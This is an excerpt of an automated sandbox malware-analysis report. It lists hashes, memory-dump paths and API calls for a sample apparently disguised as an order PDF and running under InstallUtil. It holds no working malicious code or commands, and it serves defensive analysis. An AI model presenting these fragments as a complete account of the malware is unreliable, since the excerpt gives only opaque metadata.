                                                                        • Opcode ID: eda0eb4290878b822a90beaec5cb682964d2c3924ea0bd7dcaa2d68f6a2af4fa
                                                                        • Instruction ID: e14726a5d84f060e4d4146254ee505978f42d56a49977c3235ff2b503e7df19f
                                                                        • Opcode Fuzzy Hash: eda0eb4290878b822a90beaec5cb682964d2c3924ea0bd7dcaa2d68f6a2af4fa
                                                                        • Instruction Fuzzy Hash: B3F05875905208AFCB00CFA8E801AADBFB5EB48311F04C1A9E85462352D732AA12EF91
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9553685185710ccf664c9c0e3ef39e0faf64ad3b24b45a9acf88d43751654897
                                                                        • Instruction ID: 7a153e697ddd0611285d8434674a7d5a16339e56d03ca983871e4c9835ff1a29
                                                                        • Opcode Fuzzy Hash: 9553685185710ccf664c9c0e3ef39e0faf64ad3b24b45a9acf88d43751654897
                                                                        • Instruction Fuzzy Hash: 4AE02230909288AFCB01CBA4DC405A8BFB4AB42310F1081DAD90463353DB306D02CB92
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 78887196cf5da8a8701a9215a6e059df243bc4a2992e72066f633d99eb727f23
                                                                        • Instruction ID: a18b082384b3c601a0feaf0271c9419ca0d1f162a160ed54604ed836afc1ac85
                                                                        • Opcode Fuzzy Hash: 78887196cf5da8a8701a9215a6e059df243bc4a2992e72066f633d99eb727f23
                                                                        • Instruction Fuzzy Hash: D1F08CB5909248AFCB01DF94EC459AEBF75EF45300F00C089EE04273A2D7329A26EB81
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 320afbf1165e9e17e1ba51ab989f8e7e19c6b65d2306a7106a4773ba7739a7f8
                                                                        • Instruction ID: 8aa83810febcb1aa7ef19e062f7d04a9e8481383408d206cc91b8195e33b965b
                                                                        • Opcode Fuzzy Hash: 320afbf1165e9e17e1ba51ab989f8e7e19c6b65d2306a7106a4773ba7739a7f8
                                                                        • Instruction Fuzzy Hash: ACF0E57490D248BBC740DBA8D8456ACBFB89B46300F14D09AE88867292C7719A41DBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2eeeb4926bb32fc52c1f3f1d89a935fa5f23c8e80de62c59dc4a8cc41da3c204
                                                                        • Instruction ID: 53fe24ca8146144c9bf1f1671490ba711c99551c714ac61eaac20ebac0d4951c
                                                                        • Opcode Fuzzy Hash: 2eeeb4926bb32fc52c1f3f1d89a935fa5f23c8e80de62c59dc4a8cc41da3c204
                                                                        • Instruction Fuzzy Hash: 03E09B74905248AFC744DBA8D8455ACBFF4FB49314F1441DDE908D3352E7715E42C752
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3da36ece6395d3df41f5dbf89543c59ef6c6a306dc9871ae115850fd29647300
                                                                        • Instruction ID: 785ad22072e8aebf44530eda9532f802a842ccbd487c05fdb0e9794eed46f460
                                                                        • Opcode Fuzzy Hash: 3da36ece6395d3df41f5dbf89543c59ef6c6a306dc9871ae115850fd29647300
                                                                        • Instruction Fuzzy Hash: 64F08C34909208EFC761CFA4D845AA9BFB4EB44300F1081AAE84457351D6316A16DB96
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1740111070.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72d0000_Order88983273293729387293828PDF.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b6330ca43c29e75829dc4adde86f67d6a9d3b15d1e6055f5a6f9eda259aaf89c
                                                                        • Instruction ID: c54e39f87fe6116eb149cd297b21b510b59041612a99daedc721ef057b8ed95d
                                                                        • Opcode Fuzzy Hash: b6330ca43c29e75829dc4adde86f67d6a9d3b15d1e6055f5a6f9eda259aaf89c
                                                                        • Instruction Fuzzy Hash: 0BE0867490910CEBC744DFD4D8409BDBFB8AB45310F14D1AAE99867351C7719E42DBA4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5ff6369d64267f568444b446b6e06c7f12b6da4e24e37c2cc6d1f6c58ed5043f
                                                                        • Instruction ID: d6996fa9cd06430910cd27897d764fdec58e788030147e78c78c3d8dbf86101c
                                                                        • Opcode Fuzzy Hash: 5ff6369d64267f568444b446b6e06c7f12b6da4e24e37c2cc6d1f6c58ed5043f
                                                                        • Instruction Fuzzy Hash: 42E0ED7590510CABCB44DF94D4405ACBBB4AB49310F14C1A9D89453351D6319A51DF54
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e5c042646eb75b0bf83cc0ef2ccceca270971e47a6e5bbaf5347b293b2ac2e48
                                                                        • Instruction ID: b28124ce7660e6c12529fae78a6b80d3a0aa9f442a692f7bbd6b928a0e06bc17
                                                                        • Opcode Fuzzy Hash: e5c042646eb75b0bf83cc0ef2ccceca270971e47a6e5bbaf5347b293b2ac2e48
                                                                        • Instruction Fuzzy Hash: EAF0B2B4E4122ACFDF60DF24DC84BADBBB1BB08304F1080E9A519A7244D7306E819F40
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 73995b0c3fc1955fe1b8200173084333a5f89384d9047124a73f865dc5390509
                                                                        • Instruction ID: b8ef9dcd778c836cfc2d0f9f58fb9005173a8e129bdd62f8438d196a941d8c8f
                                                                        • Opcode Fuzzy Hash: 73995b0c3fc1955fe1b8200173084333a5f89384d9047124a73f865dc5390509
                                                                        • Instruction Fuzzy Hash: 9EE0E57490520CEFCB55DF99D8809ACBBB4AB48310F10C1AAE854A3351D631AA56EB86
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1740111070.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72d0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 28eae619960136c4a841073c51f168e10af6c8e18a66b9c61662a93b4a2a88e3
                                                                        • Instruction ID: fa68808b5272f532f53bf34a869973439ec350ded48f34bb6a396d004e6ee843
                                                                        • Opcode Fuzzy Hash: 28eae619960136c4a841073c51f168e10af6c8e18a66b9c61662a93b4a2a88e3
                                                                        • Instruction Fuzzy Hash: 2AE01A74D05208EBC744DFE8D4406ACBBB8AB49310F1491A9D85853381C6715A02DB81
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c9513738da8d126e3ca24b04cbff5eff483d2ea97bd6558c91b3b62cd7233844
                                                                        • Instruction ID: 5d4c06a5fa5e9eb25ab3421d3233b07bd783540c22b4f49bc689bfaad16cb2eb
                                                                        • Opcode Fuzzy Hash: c9513738da8d126e3ca24b04cbff5eff483d2ea97bd6558c91b3b62cd7233844
                                                                        • Instruction Fuzzy Hash: 11E0BF74A05108DFC784DFA9D945AACBBF4AB48314F1081A9D909D3351E771AA42DB51
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dd3b6fa6f9376eeef7733db818fac5d88ef89d771825c1d8fd2402d9e698fe45
                                                                        • Instruction ID: d645bca4898f19d7c412845e450ef395f6a4e32c8c0928dc7fc37ac95de31d3b
                                                                        • Opcode Fuzzy Hash: dd3b6fa6f9376eeef7733db818fac5d88ef89d771825c1d8fd2402d9e698fe45
                                                                        • Instruction Fuzzy Hash: 47E0863491510CEBC704DF98D8409ACBB74EB45310F20D1A9DC4423350C7316E52DB84
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1740111070.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72d0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3f4e49312f25d4d5a9345ff54bbc1d4a86eb86c51cecf60765e041fba6a68acb
                                                                        • Instruction ID: b6a5fd4e5772de5d59785ac74900a8d3410065041a6a074fd31794b253d05104
                                                                        • Opcode Fuzzy Hash: 3f4e49312f25d4d5a9345ff54bbc1d4a86eb86c51cecf60765e041fba6a68acb
                                                                        • Instruction Fuzzy Hash: 76E0C2B4D19108DBC704DFD4E8456ACFBB8EB45310F10919CE80823341DB719E02CB80
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1740111070.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72d0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9d85e139626cca0092f8275e54292d72eb42403566d04409bbce04bd3f2814a0
                                                                        • Instruction ID: 766dacda00895a570c9b567a4bc2574a7aa7152f1511a6cb0771c41861c008be
                                                                        • Opcode Fuzzy Hash: 9d85e139626cca0092f8275e54292d72eb42403566d04409bbce04bd3f2814a0
                                                                        • Instruction Fuzzy Hash: 01E0C2B154110CABCB80EFF8DD006AE77F99B05300F4010A9D408A7110EE714A1097A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction ID: 46f44d50f72902089fa1e21f4372691cf3a4121c9c5c638eff83e5c63c09e8a0
                                                                        • Opcode Fuzzy Hash: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction Fuzzy Hash: FCE01234A09108DBC704DFD4E9815BCBBB4FB45324F509199D80827351DB71AE46DB85
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction ID: c0b5dcd41deab938f061187ebfdec8f0f9559f2d90b74fdbeb4f541a91b969db
                                                                        • Opcode Fuzzy Hash: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction Fuzzy Hash: ECE01274A09108DBCB04DFD4E9415ACBBB4EB45314F5091A9D84927351DB71BE42DB85
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction ID: d513436f0c0cd8c4d3dd20f4bdee1324c0d79946bf731ac762b6d98dd8e9dcf8
                                                                        • Opcode Fuzzy Hash: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction Fuzzy Hash: A1E01274A09108DBC708DFE8E9415ACBBB8EB45314F10919DD81927351DB71BE42DB85
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction ID: 01cc425efbc6773e8247b7fe8d9769fa8b5533318944914be0651e7d8323f6fd
                                                                        • Opcode Fuzzy Hash: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction Fuzzy Hash: 2EE01235A09108EBC704DFE5E9415ACBBB8FB45314F10919DD85827351DB716E43DB85
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction ID: 31ec859e5fad078722ef55916b9c435bd2f1c4ba1a74f7f190299598aaa8c3f5
                                                                        • Opcode Fuzzy Hash: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction Fuzzy Hash: BCE01234A0920CDFC704DFE4E9415ACBBB4FB85314F249199D80927351DB716E42DB85
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 706c67f50d1ca612cb9ff7ae43e90fbe73c39a4d11bd2182c48772c755c7b53c
                                                                        • Instruction ID: d4db800927f4f902dfe69e9cc1371ede09afd98b29476c5ce5fab223b8d91214
                                                                        • Opcode Fuzzy Hash: 706c67f50d1ca612cb9ff7ae43e90fbe73c39a4d11bd2182c48772c755c7b53c
                                                                        • Instruction Fuzzy Hash: 54E0127194110CABCB80EFF8D9006AE77F99B05310F1055A5D515A7250EE715A5097A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction ID: 87f3688b80465667eb76a623ca19479aae41cd9b5c88f5f748627b11a20183e7
                                                                        • Opcode Fuzzy Hash: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction Fuzzy Hash: 43E08C34A0910CEBC704DF94E8405ACBBB8BB45310F109199D80823340CB316E02DB80
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction ID: dd91f5d9c971d7522726cc352e850296f103915db4c733f4e65992c169780b0b
                                                                        • Opcode Fuzzy Hash: d218348347959342cfd84d5b6f31349677e4060d244419efd68d127f2188e7ca
                                                                        • Instruction Fuzzy Hash: 96E0C234A09108DBC704DFD4E8405ACBBB8EB45310F10919CD80937340CB316E02DB80
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fea52d34606215a02166b30d14e14d4a5b673b06d54c0e6923ce23787ec6c02c
                                                                        • Instruction ID: 34644b5a652d0bf1f91f496ccc9ea3f7dd45def1c1209007a84dabe70d3da630
                                                                        • Opcode Fuzzy Hash: fea52d34606215a02166b30d14e14d4a5b673b06d54c0e6923ce23787ec6c02c
                                                                        • Instruction Fuzzy Hash: 85E0EC70D0520CEFCB40DBA898456ADBBF8AB04710F2051A99908A3750E7706B41D741
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd

                                                                        Execution Graph

                                                                        Execution Coverage:11%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:49
                                                                        Total number of Limit Nodes:8

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 026865BE
                                                                        • GetCurrentThread.KERNEL32 ref: 026865FB
                                                                        • GetCurrentProcess.KERNEL32 ref: 02686638
                                                                        • GetCurrentThreadId.KERNEL32 ref: 02686691
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2918707031.0000000002680000.00000040.00000800.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_2680000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: ed38d2e8d1a13ed967c5ffb81d80d38bc28035a977b24e1473427e024da167b8
                                                                        • Instruction ID: 9a6998fa6ac065969d383bbe49c731b211504f92d3f915b0e1f0f543978be24b
                                                                        • Opcode Fuzzy Hash: ed38d2e8d1a13ed967c5ffb81d80d38bc28035a977b24e1473427e024da167b8
                                                                        • Instruction Fuzzy Hash: 1D8145B0D00249CFDB14DFAAC548B9EBBF5EF48314F208569D419A7350D734A985CF66

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 026865BE
                                                                        • GetCurrentThread.KERNEL32 ref: 026865FB
                                                                        • GetCurrentProcess.KERNEL32 ref: 02686638
                                                                        • GetCurrentThreadId.KERNEL32 ref: 02686691
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2918707031.0000000002680000.00000040.00000800.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_2680000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: 8dbc7566f285efa6d6fd7d3e3ee5ac6fb1af4c05389834f7876d73c659474107
                                                                        • Instruction ID: 3dc68ab0857340ef0e159d98c19023d4a3b0c2ef686667fe7dd0b6fedb4ac957
                                                                        • Opcode Fuzzy Hash: 8dbc7566f285efa6d6fd7d3e3ee5ac6fb1af4c05389834f7876d73c659474107
                                                                        • Instruction Fuzzy Hash: 505137B0D00249CFDB14DFA9D648B9EBBF5EF48304F208559E419A7360DB34A984CF66

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (bq$(bq$(bq
                                                                        • API String ID: 0-2716923250
                                                                        • Opcode ID: c5ac13317998708bb9e008636045e0bbe516ffee790fd7cb5cf1f1b0f7421ccf
                                                                        • Instruction ID: a10bbc4bb6b444d86137f8e7f25726312927b72a79aaba6be504f439a4606794
                                                                        • Opcode Fuzzy Hash: c5ac13317998708bb9e008636045e0bbe516ffee790fd7cb5cf1f1b0f7421ccf
                                                                        • Instruction Fuzzy Hash: 6802AC71B006158FCB14DF68C99466EBBF2FF98300B14866EE54ADB784DA34ED06CB91

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (bq$(bq$Hbq
                                                                        • API String ID: 0-2835675688
                                                                        • Opcode ID: 2b2cda50228d96110afafd59d7f1a8fce55deee259ff21d6c806e9d377ddf379
                                                                        • Instruction ID: 26f0ab6c419835d59780bbe0fd1ca01a468f4b5329fb14917a09a2fdfa52488a
                                                                        • Opcode Fuzzy Hash: 2b2cda50228d96110afafd59d7f1a8fce55deee259ff21d6c806e9d377ddf379
                                                                        • Instruction Fuzzy Hash: 7EE17574A00209DFCB48EFA4D9949ADBBB2FF89300F108569E415AB365DF34ED46CB91

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q$4'^q
                                                                        • API String ID: 0-2697143702
                                                                        • Opcode ID: e513d1247d063ecd74eb8ccd397c18e6c287ca725a8f00a154f8b72673abf54b
                                                                        • Instruction ID: 86ae1cfdff9aaffce535e0701739bd06e2fa62d0b65b4f0b56fec67ded7f7983
                                                                        • Opcode Fuzzy Hash: e513d1247d063ecd74eb8ccd397c18e6c287ca725a8f00a154f8b72673abf54b
                                                                        • Instruction Fuzzy Hash: B9C1B674B10218DFCB48EFA8C994A9DB7F2BF89300F104169E516AB3A5DB31EC42CB50

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q$4'^q
                                                                        • API String ID: 0-2697143702
                                                                        • Opcode ID: 1e638f2e075f84c960a00951357775232e0e34c6e53383ec564ea71a96a774c0
                                                                        • Instruction ID: 177fccc76efeef955db8758de0c8ce88b9aebc0d3b617234d0101641626af003
                                                                        • Opcode Fuzzy Hash: 1e638f2e075f84c960a00951357775232e0e34c6e53383ec564ea71a96a774c0
                                                                        • Instruction Fuzzy Hash: F5C1B674B10219DFCB48EFA4C994A9DB7F2BF89300F104169E516AB3A5DB35ED42CB90

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0268C25E
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2918707031.0000000002680000.00000040.00000800.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_2680000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: dd26d8170caa1290d336e4ad2ba29ecca5dc67accfdb32931710bb3944c19256
                                                                        • Instruction ID: 531c35591207c7bd244db1ae603949e3a70ad7e8ed3d39428396e61851a25922
                                                                        • Opcode Fuzzy Hash: dd26d8170caa1290d336e4ad2ba29ecca5dc67accfdb32931710bb3944c19256
                                                                        • Instruction Fuzzy Hash: 6C813470A00B458FD728EF69D55075ABBF2BF88344F008A2ED48AD7B50DB75E946CB90

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 02687421
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2918707031.0000000002680000.00000040.00000800.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_2680000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 5f3dcb7d0dca05b50fd8aece90cdbe2114c696a38f35b01b51dd1ebe3f340bdb
                                                                        • Instruction ID: ea8f09a239ff6bdd743e746dc8b86d145dfb05a9b864f1ce950d884b0ca12cf2
                                                                        • Opcode Fuzzy Hash: 5f3dcb7d0dca05b50fd8aece90cdbe2114c696a38f35b01b51dd1ebe3f340bdb
                                                                        • Instruction Fuzzy Hash: 9641EFB0C00619CFDB24DFA9C944BCEFBB5BF49304F24816AD408AB255DB75698ACF90

                                                                        Control-flow Graph

                                                                        APIs
